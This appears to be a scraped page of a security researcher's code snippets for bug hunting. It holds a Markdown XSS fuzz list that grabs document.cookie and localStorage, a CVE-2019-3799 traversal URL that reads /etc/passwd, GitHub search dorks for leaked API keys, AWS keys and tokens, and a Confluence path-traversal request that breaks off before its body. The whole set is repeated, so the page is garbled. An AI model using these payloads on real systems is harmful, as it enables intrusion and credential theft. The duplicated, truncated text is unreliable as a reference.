Yassine ABOUKIR yassineaboukir

## List of API endpoints & objects
0
00
01
02
03
1
1.0
10
100
1000

## warfare.php
<pre>phpinfo();</pre>

## Electron app decompiling
# Open terminal and install asar node module globally

$ npm install -g asar

# Go into the app’s directory, in our case it’s Slack

$ cd /Applications/Slack.app/Contents/Resources

# Create a directory to paste the content of app

## git-remove.sh
( find . -type d -name ".git" \
  && find . -name ".gitignore" \
  && find . -name ".gitmodules" ) | xargs rm -rf

## Markdown XSS fuzzlist
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

## CVE-2019-3799
http://example.com:8081/label/default/master/..%252F..%252F..%252F../etc/passwd

ref: https://twitter.com/chybeta/status/1118370858974760963?s=19

## github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces

## Confluence Path traversal
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: xxx.com
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
X-Atlassian-Token: no-check
Content-Type: application/json; charset=utf-8
Referer: https://xxxx.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Length: 168
	# Open terminal and install asar node module globally

	$ npm install -g asar

	# Go into the app’s directory, in our case it’s Slack

	$ cd /Applications/Slack.app/Contents/Resources

	# Create a directory to paste the content of app
	( find . -type d -name ".git" \
	&& find . -name ".gitignore" \
	&& find . -name ".gitmodules" ) \| xargs rm -rf
	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')
	![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
	![Escape SRC - onerror]("onerror="alert('ImageOnError'))
	[XSS](javascript:prompt(document.cookie))
	[XSS](j a v a s c r i p t:prompt(document.cookie))
	[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
	http://example.com:8081/label/default/master/..%252F..%252F..%252F../etc/passwd

	ref: https://twitter.com/chybeta/status/1118370858974760963?s=19
	“Hackme.tld” API_key
	“Hackme.tld” secret_key
	“Hackme.tld” aws_key
	“Hackme.tld” Password
	“Hackme.tld” FTP
	“Hackme.tld” login
	“Hackme.tld” github_token
	“Hackme.tld” http:// & https://
	“Hackme.tld” amazonaws
	“Hackme.tld” digitaloceanspaces
	POST /rest/tinymce/1/macro/preview HTTP/1.1
	Host: xxx.com
	Connection: close
	Accept-Encoding: gzip, deflate
	Accept: text/html, /; q=0.01
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
	X-Atlassian-Token: no-check
	Content-Type: application/json; charset=utf-8
	Referer: https://xxxx.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
	Content-Length: 168